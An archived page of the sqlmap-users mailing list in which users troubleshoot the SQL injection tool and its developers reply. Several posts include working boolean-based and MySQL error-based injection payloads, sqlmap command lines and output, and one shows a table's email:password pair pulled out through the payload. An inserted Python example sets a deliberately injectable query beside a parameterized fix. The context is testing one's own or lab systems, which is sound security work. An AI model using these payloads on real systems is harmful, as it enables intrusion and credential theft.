sqlmap-users Mailing List for sqlmap (Page 70)
From: Miroslav S. <mir...@gm...> - 2012-01-07 16:24:42

Hi.

This looks strange:

1'%20OR 1=1 AND 1='1
and
1' OR 1=1 AND 1='2

Could you please try to find the simplest vectors/payloads that work, e.g.:

1' AND '1'='1
1' AND '1'='2

From these payloads I am not sure why is there OR 1=1 and how is this evaluated to True or False (as OR 1=1 should evaluate in normal cases to True in both vectors you've sent)

Kind regards

On Sat, Jan 7, 2012 at 5:10 PM, cats <du...@al...> wrote:

> Ok so I know that my site has an sqli (and boolean/mysql time based).
> I even tried both of them myself and the results are very clear and
> simple, yet sqlmap doesn't seem to see it. It can find the time based at
> first, but it always ends up saying that it's a false positive.
>
> cURL will give me the following result from the page, using "and boolean
> based sqli" with a true statement:
>
> curl --data "lostpass=1'%20OR 1=1 AND 1='1"
> http://localhost/account/index.php
>
> <div class='message' style='padding:10px;'>Your password was e-mailed to
> 1' OR 1='1</div>
>
> And now a false one
>
> curl --data "lostpass=1' OR 1=1 AND 1='2"
> http://localhost/account/index.php
>
> <td class='message'>The email address you entered 1' OR 1=1 AND 1='2
> does not exist</p>
>
> I have tried with --string and --text-only with sqlmap, but I get the
> same results over and over. Here's some sample output:
>
> python sqlmap.py -u "http://localhost/account/index.php" --random-agent
> --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to"
> --text-only --delay=5 --technique=TB
>
> [16:57:34] [INFO] testing connection to the target url
> [16:57:49] [INFO] heuristics detected web page charset 'ascii'
> [16:57:50] [INFO] testing if the provided string is within the target
> URL page content
> [16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
> [16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
> [16:58:13] [INFO] POST parameter 'lostpass' is dynamic
> [16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass'
> might not be injectable
> [16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
> [16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> [16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
> [17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND
> time-based blind' injectable
> [17:00:48] [INFO] checking if the injection point on POST parameter
> 'lostpass' is a false positive
> [17:03:09] [WARNING] false positive injection point detected
> [17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
> [17:03:09] [CRITICAL] all parameters appear to be not injectable.
>
> I tried with a sleep(5) injection manually as well, and it works like a
> charm. Any ideas?
>
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

--
Miroslav Stampar
http://about.me/stamparm

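
The operator precedence behind the two payloads quoted in this thread, as an added example that is not part of the original messages and is not sqlmap code: SQL evaluates AND before OR, so the injected condition parses as email='1' OR (1=1 AND <last comparison>), and the same lookup written with a bound parameter answers both payloads identically. The table, rows and function names are assumptions, and the last comparison uses two string literals because SQLite, unlike the MySQL target in the thread, does not treat 1='1' as true.

```python
import sqlite3

# Payloads adapted from the thread. Only the final comparison differs from
# the originals (string literals on both sides, see the note above); the
# OR/AND structure is unchanged.
TRUE_PAYLOAD = "1' OR 1=1 AND '1'='1"
FALSE_PAYLOAD = "1' OR 1=1 AND '1'='2"


def make_db():
    """Build a constructed in-memory table standing in for the account store."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (email TEXT)")  # hypothetical schema
    db.executemany(
        "INSERT INTO users (email) VALUES (?)",
        [("alice@example.test",), ("bob@example.test",)],  # constructed rows
    )
    return db


def lookup_vulnerable(db, lostpass):
    """Deliberately vulnerable: the input is concatenated into the SQL text.

    With TRUE_PAYLOAD the WHERE clause becomes
        email = '1' OR (1=1 AND '1'='1')   -> true for every row
    and with FALSE_PAYLOAD
        email = '1' OR (1=1 AND '1'='2')   -> false unless email is '1'
    """
    sql = "SELECT email FROM users WHERE email = '" + lostpass + "'"
    return db.execute(sql).fetchall()


def lookup_parameterized(db, lostpass):
    """Hardened: the input is bound as data and never parsed as SQL."""
    return db.execute(
        "SELECT email FROM users WHERE email = ?", (lostpass,)
    ).fetchall()


def render(rows, lostpass):
    """Mimic the two page messages quoted in the thread."""
    if rows:
        return "Your password was e-mailed to " + lostpass
    return "The email address you entered " + lostpass + " does not exist"


def has_boolean_oracle(lookup):
    """Return True when the two payloads are answered differently.

    A difference means the page reveals the truth value of an injected
    condition, which is what a boolean-based blind test looks for.
    """
    db = make_db()
    found_true = bool(lookup(db, TRUE_PAYLOAD))
    found_false = bool(lookup(db, FALSE_PAYLOAD))
    return found_true != found_false


if __name__ == "__main__":
    db = make_db()
    for name, lookup in (("vulnerable", lookup_vulnerable),
                         ("parameterized", lookup_parameterized)):
        for payload in (TRUE_PAYLOAD, FALSE_PAYLOAD):
            print(name, "|", render(lookup(db, payload), payload))
        print(name, "| boolean oracle:", has_boolean_oracle(lookup))
```
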
From: cats <du...@al...> - 2012-01-07 16:10:54

Ok so I know that my site has an sqli (and boolean/mysql time based). I even tried both of them myself and the results are very clear and simple, yet sqlmap doesn't seem to see it. It can find the time based at first, but it always ends up saying that it's a false positive.

cURL will give me the following result from the page, using "and boolean based sqli" with a true statement:

curl --data "lostpass=1'%20OR 1=1 AND 1='1" http://localhost/account/index.php

<div class='message' style='padding:10px;'>Your password was e-mailed to 1' OR 1='1</div>

And now a false one

curl --data "lostpass=1' OR 1=1 AND 1='2" http://localhost/account/index.php

<td class='message'>The email address you entered 1' OR 1=1 AND 1='2 does not exist</p>

I have tried with --string and --text-only with sqlmap, but I get the same results over and over. Here's some sample output:

python sqlmap.py -u "http://localhost/account/index.php" --random-agent --data="lostpass=1' OR 1='1" --string="Your password was e-mailed to" --text-only --delay=5 --technique=TB

[16:57:34] [INFO] testing connection to the target url
[16:57:49] [INFO] heuristics detected web page charset 'ascii'
[16:57:50] [INFO] testing if the provided string is within the target URL page content
[16:57:56] [INFO] testing if POST parameter 'lostpass' is dynamic
[16:58:05] [INFO] confirming that POST parameter 'lostpass' is dynamic
[16:58:13] [INFO] POST parameter 'lostpass' is dynamic
[16:58:19] [WARNING] heuristic test shows that POST parameter 'lostpass' might not be injectable
[16:58:19] [INFO] testing sql injection on POST parameter 'lostpass'
[16:58:19] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[16:59:21] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:00:48] [INFO] POST parameter 'lostpass' is 'MySQL > 5.0.11 AND time-based blind' injectable
[17:00:48] [INFO] checking if the injection point on POST parameter 'lostpass' is a false positive
[17:03:09] [WARNING] false positive injection point detected
[17:03:09] [WARNING] POST parameter 'lostpass' is not injectable
[17:03:09] [CRITICAL] all parameters appear to be not injectable.

I tried with a sleep(5) injection manually as well, and it works like a charm. Any ideas?

From: Nicolas K. <kr...@de...> - 2012-01-07 16:04:12

Hi again,

Really thanks for the fast response, great work !

Regards,
Nicolas

On Sat, Jan 7, 2012 at 5:14 PM, Miroslav Stampar <mir...@gm...> wrote:

> Hi Nicolas.
>
> Please update to the latest revision from our SVN repository and run
> sqlmap with:
> --headers="client-ip: 123.123.123.123\nx-forwarded-for: blalbla..."
>
> Kind regards,
> Miroslav Stampar
>
> On Fri, Jan 6, 2012 at 9:26 PM, Nicolas Krassas <kr...@de...> wrote:
>
>> Hi all,
>>
>> I would like to ask if there is a way to specify "client-ip" as
>> additional header value, also if the following header values are supported,
>> "via", "x-forwarded-for" and "accepted-language".
>>
>> Thanks in advance
>> Nicolas
>
> --
> Miroslav Stampar
> http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-07 15:36:35

Hi Ryan.

You are advised to use auxiliary switches in this kind of cases:
--string or --text-only could help you here

Kind regards,
Miroslav Stampar

On Fri, Jan 6, 2012 at 5:52 PM, ryan cartner <rya...@gm...> wrote:

> I'm testing this cornerstone cms vuln
>
> http://www.exploit-db.com/exploits/18319/
>
> when i load this url (http://192.168.1.101/default.asp?id=2%27) manually
> in my browser I get
>
> Microsoft JET Database Engine error '80040e14'
>
> Syntax error in string in query expression 'Id=2''.
> sqlmap doesn't find anything:
>
> [11:48:01] [INFO] testing connection to the target url
> [11:48:02] [INFO] testing if the url is stable, wait a few seconds
> [11:48:04] [INFO] url is stable
> [11:48:04] [INFO] testing if GET parameter 'id' is dynamic
> [11:48:04] [INFO] heuristics detected web page charset 'ascii'
> [11:48:05] [INFO] confirming that GET parameter 'id' is dynamic
> [11:48:05] [INFO] GET parameter 'id' is dynamic
> [11:48:06] [INFO] heuristic test shows that GET parameter 'id' might be
> injectable (possible DBMS: Microsoft Access)
> [11:48:06] [INFO] testing sql injection on GET parameter 'id'
> [11:48:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
> clause'
> parsed error message(s) showed that the back-end DBMS could be Microsoft
> Access. Do you want to skip test payloads specific for other DBMSes? [Y/n]
> [11:48:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
> [11:48:28] [WARNING] GET parameter 'id' is not injectable
> [11:48:28] [CRITICAL] all parameters appear to be not injectable. Try to
> increase --level/--risk values to perform more tests. Rerun by providing
> either a valid --string or a valid --regexp, refer to the user's manual for
> details
> [11:48:28] [WARNING] HTTP error codes detected during testing:
> 500 (Internal Server Error) - 47 times
>
> [*] shutting down at: 11:48:28

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-07 15:21:57

Hi Cats.

Just tried on MySQL/Error test case and it appears ok. Could you please send exact command line(s) you've used (without target url)? Please, use --flush-session as part of the first run.

Kind regards,
Miroslav Stampar

On Sat, Jan 7, 2012 at 1:06 AM, cats <du...@al...> wrote:

> Hello!
>
> I was playing around with sqlmap at home, and I noticed all of a sudden
> that I couldn't get it to extract any columns or rows all of a sudden.
> Database names, current users, tables and such works fine, but
> extracting any columns with --dump doesn't work, and thus not getting
> any rows either. --columns seems to work though, although if I do that
> first and then --dump, it still won't work.
>
> Here's some output from sqlmap:
>
> At revision 4654.
>
> [00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test'
> on database 'testDB'
> [00:47:11] [ERROR] unable to retrieve the number of columns for table
> 'test' on database 'testDB'
> [00:47:11] [ERROR] unable to retrieve the columns for any table on
> database 'testDB'
> [00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for
> table 'test' on database 'testDB'
> [00:47:13] [WARNING] the SQL query provided does not return any output
> [00:47:13] [INFO] analyzing table dump for possible password hashes
> Database: testDB
> Table: test
> [0 entries]
> +----------+----------+
> | strTest1 | strTest2 |
> +----------+----------+
> +----------+----------+
>
> The vulnerability used by sqlmap is the following error based one:
>
> ---
> Place: GET
> Parameter: q
> Type: error-based
> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
> Payload: q=2) AND (SELECT 2155 FROM(SELECT
> COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE
> 0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM
> INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
> ---
>
> And if I try to extract data manually through my browser, then it works
> perfectly:
>
> Notice the extracted data: te...@ma...:aPassword
>
> Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key'
> select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT
> COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557)
> THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test
> GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 =
> 2) AND (SELECT 2557 FROM(SELECT
> COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1
> ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY
> x)a) AND (8882=8882)
>
> PS: I tried specifying with "-C strTest1,strTest2" as well
>
> Any ideas? :-)
>
> Thanks in advance, and thanks for a great tool (helps me a lot in my
> work, and saves me time from having to write my own scripts all the time
> to test my software)!

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-07 15:14:53

Hi Nicolas.

Please update to the latest revision from our SVN repository and run sqlmap with:
--headers="client-ip: 123.123.123.123\nx-forwarded-for: blalbla..."

Kind regards,
Miroslav Stampar

On Fri, Jan 6, 2012 at 9:26 PM, Nicolas Krassas <kr...@de...> wrote:

> Hi all,
>
> I would like to ask if there is a way to specify "client-ip" as
> additional header value, also if the following header values are supported,
> "via", "x-forwarded-for" and "accepted-language".
>
> Thanks in advance
> Nicolas

--
Miroslav Stampar
http://about.me/stamparm

From: Bernardo D. A. G. <ber...@gm...> - 2012-01-07 13:31:03

Hi Nicolas,

There is a switch to specify any additional header to your requests. I recommend you either specify them in the .conf file or provide sqlmap with the raw request in a text file with -r switch. Given there are no bugs, sqlmap will process the request and replay it with the exact same headers, please do report bugs if any here.

Bernardo Damele A. G.

This message was sent from a smartphone

On 6 Jan 2012, at 20:51, Nicolas Krassas <kr...@de...> wrote:

> Hi all,
>
> I would like to ask if there is a way to specify "client-ip" as additional header value, also if the following header values are supported, "via", "x-forwarded-for" and "accepted-language".
>
> Thanks in advance
> Nicolas

From: cats <du...@al...> - 2012-01-07 00:06:28

Hello!

I was playing around with sqlmap at home, and I noticed all of a sudden that I couldn't get it to extract any columns or rows all of a sudden. Database names, current users, tables and such works fine, but extracting any columns with --dump doesn't work, and thus not getting any rows either. --columns seems to work though, although if I do that first and then --dump, it still won't work.

Here's some output from sqlmap:

At revision 4654.

[00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the number of columns for table 'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the columns for any table on database 'testDB'
[00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for table 'test' on database 'testDB'
[00:47:13] [WARNING] the SQL query provided does not return any output
[00:47:13] [INFO] analyzing table dump for possible password hashes
Database: testDB
Table: test
[0 entries]
+----------+----------+
| strTest1 | strTest2 |
+----------+----------+
+----------+----------+

The vulnerability used by sqlmap is the following error based one:

---
Place: GET
Parameter: q
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: q=2) AND (SELECT 2155 FROM(SELECT COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE 0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
---

And if I try to extract data manually through my browser, then it works perfectly:

Notice the extracted data: te...@ma...:aPassword

Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key'
select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 = 2) AND (SELECT 2557 FROM(SELECT COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY x)a) AND (8882=8882)

PS: I tried specifying with "-C strTest1,strTest2" as well

Any ideas? :-)

Thanks in advance, and thanks for a great tool (helps me a lot in my work, and saves me time from having to write my own scripts all the time to test my software)!

From: Jimmy R. <jr...@al...> - 2012-01-06 23:56:00

Hello!

I was playing around with sqlmap at home, and I noticed all of a sudden that I couldn't get it to extract any columns or rows all of a sudden. Database names, current users, tables and such works fine, but extracting any columns with --dump doesn't work, and thus not getting any rows either. --columns seems to work though, although if I do that first and then --dump, it still won't work.

Here's some output from sqlmap:

At revision 4654.

[00:47:11] [INFO] fetching columns 'strTest1, strTest2' for table 'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the number of columns for table 'test' on database 'testDB'
[00:47:11] [ERROR] unable to retrieve the columns for any table on database 'testDB'
[00:47:11] [INFO] fetching column(s) 'strTest1, strTest2' entries for table 'test' on database 'testDB'
[00:47:13] [WARNING] the SQL query provided does not return any output
[00:47:13] [INFO] analyzing table dump for possible password hashes
Database: testDB
Table: test
[0 entries]
+----------+----------+
| strTest1 | strTest2 |
+----------+----------+
+----------+----------+

The vulnerability used by sqlmap is the following error based one:

---
Place: GET
Parameter: q
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: q=2) AND (SELECT 2155 FROM(SELECT COUNT(*),CONCAT(0x3a6275763a,(SELECT (CASE WHEN (2155=2155) THEN 1 ELSE 0 END)),0x3a6b73693a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (3039=3039
---

And if I try to extract data manually through my browser, then it works perfectly:

Notice the extracted data: te...@ma...:aPassword

Duplicate entry te...@ma...:aPassword :gtb:1' for key 'group_key'
select * from test WHERE (StrTest1 = 2) AND (SELECT 2557 FROM(SELECT COUNT(*),CONCAT(strTest1,':',strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY x)a) AND (8882=8882 AND fuser2 = 2) OR (test1 = 2 AND test2 = 2) AND (SELECT 2557 FROM(SELECT COUNT(*),CONCAT(strTest1,strTest2,(SELECT (CASE WHEN (2557=2557) THEN 1 ELSE 0 END)),0x3a6774623a,FLOOR(RAND(0)*2))x FROM testDB.test GROUP BY x)a) AND (8882=8882)

PS: I tried specifying with "-C strTest1,strTest2" as well

Any ideas? :-)

Thanks in advance, and thanks for a great tool (helps me a lot in my work, and saves me time from having to write my own scripts all the time to test my software)!

From: Nicolas K. <kr...@de...> - 2012-01-06 20:51:00

Hi all,

I would like to ask if there is a way to specify "client-ip" as additional header value, also if the following header values are supported, "via", "x-forwarded-for" and "accepted-language".

Thanks in advance
Nicolas

From: ryan c. <rya...@gm...> - 2012-01-06 16:52:22

I'm testing this cornerstone cms vuln

http://www.exploit-db.com/exploits/18319/

when i load this url (http://192.168.1.101/default.asp?id=2%27) manually in my browser I get

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'Id=2''.
sqlmap doesn't find anything:

[11:48:01] [INFO] testing connection to the target url
[11:48:02] [INFO] testing if the url is stable, wait a few seconds
[11:48:04] [INFO] url is stable
[11:48:04] [INFO] testing if GET parameter 'id' is dynamic
[11:48:04] [INFO] heuristics detected web page charset 'ascii'
[11:48:05] [INFO] confirming that GET parameter 'id' is dynamic
[11:48:05] [INFO] GET parameter 'id' is dynamic
[11:48:06] [INFO] heuristic test shows that GET parameter 'id' might be injectable (possible DBMS: Microsoft Access)
[11:48:06] [INFO] testing sql injection on GET parameter 'id'
[11:48:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
parsed error message(s) showed that the back-end DBMS could be Microsoft Access. Do you want to skip test payloads specific for other DBMSes? [Y/n]
[11:48:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:48:28] [WARNING] GET parameter 'id' is not injectable
[11:48:28] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details
[11:48:28] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 47 times

[*] shutting down at: 11:48:28

From: Bernardo D. A. G. <ber...@gm...> - 2012-01-06 16:42:42

--batch

On 6 January 2012 16:40, Daniel Nickless <da...@1u...> wrote:

> Hi,
>
> Just wondering if there's a way to run sqlmap such that it uses the default
> answer for each prompt, rather than requiring me to press return every time!
>
> Thanks for any help :)
>
> Dan

--
Bernardo Damele A. G.
Homepage: http://about.me/inquis
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

From: Bernardo D. A. G. <ber...@gm...> - 2012-01-06 16:42:26

It looks to me like a network connection problem. The SVN server is up to me.

Bernardo

On 6 January 2012 16:23, ryan cartner <rya...@gm...> wrote:

> sqlmap version: 1.0-dev (r4009)
> Python version: 2.6.5
> Operating system: posix
> Command line: sqlmap.py --update
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
> File "sqlmap.py", line 78, in main
> init(cmdLineOptions)
> File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init
> update()
> File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
> client.update(rootDir)
> ClientError: OPTIONS of 'https://svn.sqlmap.org/sqlmap/trunk/sqlmap': could
> not connect to server (https://svn.sqlmap.org)
>
> [*] shutting down at: 11:22:16

--
Bernardo Damele A. G.
Homepage: http://about.me/inquis
E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)

From: Daniel N. <da...@1u...> - 2012-01-06 16:41:08

Hi,

Just wondering if there's a way to run sqlmap such that it uses the default answer for each prompt, rather than requiring me to press return every time!

Thanks for any help :)

Dan

From: ryan c. <rya...@gm...> - 2012-01-06 16:23:26

sqlmap version: 1.0-dev (r4009)
Python version: 2.6.5
Operating system: posix
Command line: sqlmap.py --update
Technique: None
Back-end DBMS: None (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 78, in main
    init(cmdLineOptions)
  File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init
    update()
  File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
    client.update(rootDir)
ClientError: OPTIONS of 'https://svn.sqlmap.org/sqlmap/trunk/sqlmap': could not connect to server (https://svn.sqlmap.org)

[*] shutting down at: 11:22:16

From: Gianluca B. <g...@br...> - 2012-01-06 00:25:51

Thanks guys!

On 06/Jan/2012 00:54, "Miroslav Stampar" <mir...@gm...> wrote:

> Hi Gianluca.
>
> There was indeed a minor "glitch" regarding your case. Find it "patched"
> with the latest commit (r4653).
>
> Kind regards,
> Miroslav Stampar
>
> On Thu, Jan 5, 2012 at 2:53 PM, Gianluca Brindisi <g...@br...> wrote:
>
>> Hello,
>> if I provide an URL with * like this:
>>
>> http://target.com/path/to/index.php?id=12*&action=add&path=/path/to/&imgIndex=
>>
>> sqlmap don't recognize valid get param in the urls:
>>
>> [15:34:23] [WARNING] you've provided target url without any GET
>> parameters (e.g. www.site.com/article.php?id=1) and without providing
>> any POST parameters through --data option
>> do you want to try URI injections in the target url itself? [Y/n/q]
>>
>> But looks like it inject correctly where I placed the wildcard.
>>
>> Instead without * everything is working fine as usual.
>> So I am not sure if it's this some sort of bug or it's me misusing the *
>> option (i.e. if the url is not rewrote I should just use -p id).
>>
>> Thanks,
>> Gianluca Brindisi
>
> --
> Miroslav Stampar
> http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-05 23:56:18

Hi Borja.

The error itself doesn't prove anything. You'll have to either:
1) find a valid injection manually and report back so we could fix the sqlmap (if needed) or
2) send us a traffic file which you can get with -t traffic.txt

Kind regards,
Miroslav Stampar

On Thu, Jan 5, 2012 at 4:52 PM, Borja Berastegui <bor...@gm...> wrote:

> Hi !
>
> Is my first mail to this list, as I'm an active user of the software I had
> to start mailing here someday so... here is my question:
>
> I've found a MySQL error on a website (by a modification in the URL) that
> throws me this:
>
> Warning: mysql_fetch_array(): supplied argument is not a valid MySQL
> result resource in /home/virtual/thewebsite.com/web/news/index.php on
> line 11
>
> The syntax of the url is '' http://www.thewebsite.com/news/today/*/'' and
> in the normal state of the URL there is a number (of the news page shown)
> where I have written the *.
>
> If I write anything that is not a number it returns me the error.
>
> I'm having two problems here:
>
> First one is that I'm not sure if I'm doing right the URI injection with
> sqlmap because I've found 3 URI injections in different places but without
> success. (I'm using the * to show the tool where to test)
>
> And the other one is that I'm not really sure if that error shows a really
> exploitable flaw.
>
> Sqlmap, by using the * wildcard, throws some possible UNION exploitable
> points, but are discarded when finished the tests. I have tried also with
> --union-char switch with different characters.
>
> Sorry for all this text, hope you could help me a bit :S
>
> Thanks !

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-05 23:54:13

Hi Gianluca.

There was indeed a minor "glitch" regarding your case. Find it "patched" with the latest commit (r4653).

Kind regards,
Miroslav Stampar

On Thu, Jan 5, 2012 at 2:53 PM, Gianluca Brindisi <g...@br...> wrote:

> Hello,
> if I provide an URL with * like this:
>
> http://target.com/path/to/index.php?id=12*&action=add&path=/path/to/&imgIndex=
>
> sqlmap don't recognize valid get param in the urls:
>
> [15:34:23] [WARNING] you've provided target url without any GET parameters
> (e.g. www.site.com/article.php?id=1) and without providing any POST
> parameters through --data option
> do you want to try URI injections in the target url itself? [Y/n/q]
>
> But looks like it inject correctly where I placed the wildcard.
>
> Instead without * everything is working fine as usual.
> So I am not sure if it's this some sort of bug or it's me misusing the *
> option (i.e. if the url is not rewrote I should just use -p id).
>
> Thanks,
> Gianluca Brindisi

--
Miroslav Stampar
http://about.me/stamparm

From: Miroslav S. <mir...@gm...> - 2012-01-05 23:40:52
Hi Abhishek.

Safest thing would be to checkout the whole project from the beginning:

svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev

Kind regards,
Miroslav Stampar

On Thu, Jan 5, 2012 at 4:11 PM, Abhishek Mohanty <leo...@gm...> wrote:
> root@bt:/pentest/database/sqlmap# ./sqlmap.py --update
>
> sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover
> tool
> http://sqlmap.sourceforge.net
>
> [!] Legal Disclaimer: usage of sqlmap for attacking web servers without
> prior mutual consent can be considered as an illegal activity. it is the
> final user's responsibility to obey all applicable local, state and federal
> laws. authors assume no liability and are not responsible for any misuse or
> damage caused by this program.
>
> [*] starting at: 20:30:27
>
> [20:30:28] [INFO] updating sqlmap to latest development version from the
> subversion repository
> D /pentest/database/sqlmap/txt/oracle-default-passwords.txt
> A /pentest/database/sqlmap/txt/smalldict.txt
> A /pentest/database/sqlmap/plugins/dbms/db2
> A /pentest/database/sqlmap/plugins/dbms/db2/connector.py
> A /pentest/database/sqlmap/plugins/dbms/db2/__init__.py
> A /pentest/database/sqlmap/plugins/dbms/db2/takeover.py
> A /pentest/database/sqlmap/plugins/dbms/db2/filesystem.py
> A /pentest/database/sqlmap/plugins/dbms/db2/enumeration.py
> A /pentest/database/sqlmap/plugins/dbms/db2/syntax.py
> A /pentest/database/sqlmap/plugins/dbms/db2/fingerprint.py
> A /pentest/database/sqlmap/_sqlmap.py
> D /pentest/database/sqlmap/extra/xmlobject
> A /pentest/database/sqlmap/extra/beautifulsoup
> A /pentest/database/sqlmap/extra/beautifulsoup/__init__.py
> A /pentest/database/sqlmap/extra/beautifulsoup/beautifulsoup.py
> A /pentest/database/sqlmap/doc/FAQ.pdf
> A /pentest/database/sqlmap/doc/FAQ.html
> A /pentest/database/sqlmap/lib/utils/hashdb.py
>
> [20:34:04] [CRITICAL] unhandled exception in sqlmap/1.0-dev (r4009), retry
> your run with the latest development version from the Subversion
> repository. If the exception persists, please send by e-mail to
> sql...@li... the following text and any information
> required to reproduce the bug. The developers will try to reproduce the
> bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev (r4009)
> Python version: 2.6.5
> Operating system: posix
> Command line: ./sqlmap.py --update
> Technique: None
> Back-end DBMS: None (identified)
> Traceback (most recent call last):
>   File "./sqlmap.py", line 78, in main
>   File "/pentest/database/sqlmap/lib/core/option.py", line 1752, in init
>     update()
>   File "/pentest/database/sqlmap/lib/core/update.py", line 71, in update
>     client.update(rootDir)
> ClientError: callback_get_login required
>
> [*] shutting down at: 20:34:04
>
> root@bt:/pentest/database/sqlmap# ./sqlmap.py --update
> Traceback (most recent call last):
>   File "./sqlmap.py", line 17, in <module>
>     from _sqlmap import main
>   File "/pentest/database/sqlmap/_sqlmap.py", line 27, in <module>
>     from lib.controller.controller import start
>   File "/pentest/database/sqlmap/lib/controller/controller.py", line 13,
> in <module>
>     from lib.controller.action import action
>   File "/pentest/database/sqlmap/lib/controller/action.py", line 10, in
> <module>
>     from lib.controller.handler import setHandler
>   File "/pentest/database/sqlmap/lib/controller/handler.py", line 27, in
> <module>
>     from plugins.dbms.mssqlserver import MSSQLServerMap
>   File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/__init__.py",
> line 14, in <module>
>     from plugins.dbms.mssqlserver.enumeration import Enumeration
>   File "/pentest/database/sqlmap/plugins/dbms/mssqlserver/enumeration.py",
> line 28, in <module>
>     from plugins.generic.enumeration import Enumeration as
> GenericEnumeration
>   File "/pentest/database/sqlmap/plugins/generic/enumeration.py", line 16,
> in <module>
>     from lib.core.common import BigArray
> ImportError: cannot import name BigArray
> root@bt:/pentest/database/sqlmap#

--
Miroslav Stampar
http://about.me/stamparm
From: Matt S. <ma...@su...> - 2012-01-05 22:59:28
Hi,

During December it appears that something has changed (from my perspective at least) with SQLmap. Before it was possible to issue a --dbs --tables --columns during a pentest and SQLMAP would list all databases, columns and tables. However, since upgrading to the new revision it appears that it is not possible to dump columns or perform searches outside of the current database.

Typically for the search I used to specify --search -C user,pass and SQLMap would happily go off and search all databases; now the same command only searches the current database.

[22:35:20] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) columns
[22:35:20] [INFO] fetching current database

Thanks,
M
From: Brandon P. <bpe...@gm...> - 2012-01-05 21:50:58
You can just run svn up from the root of the project.

On Thu, Jan 5, 2012 at 9:11 AM, Abhishek Mohanty <leo...@gm...> wrote:
> root@bt:/pentest/database/sqlmap# ./sqlmap.py --update
>
> sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover
> tool
> http://sqlmap.sourceforge.net
>
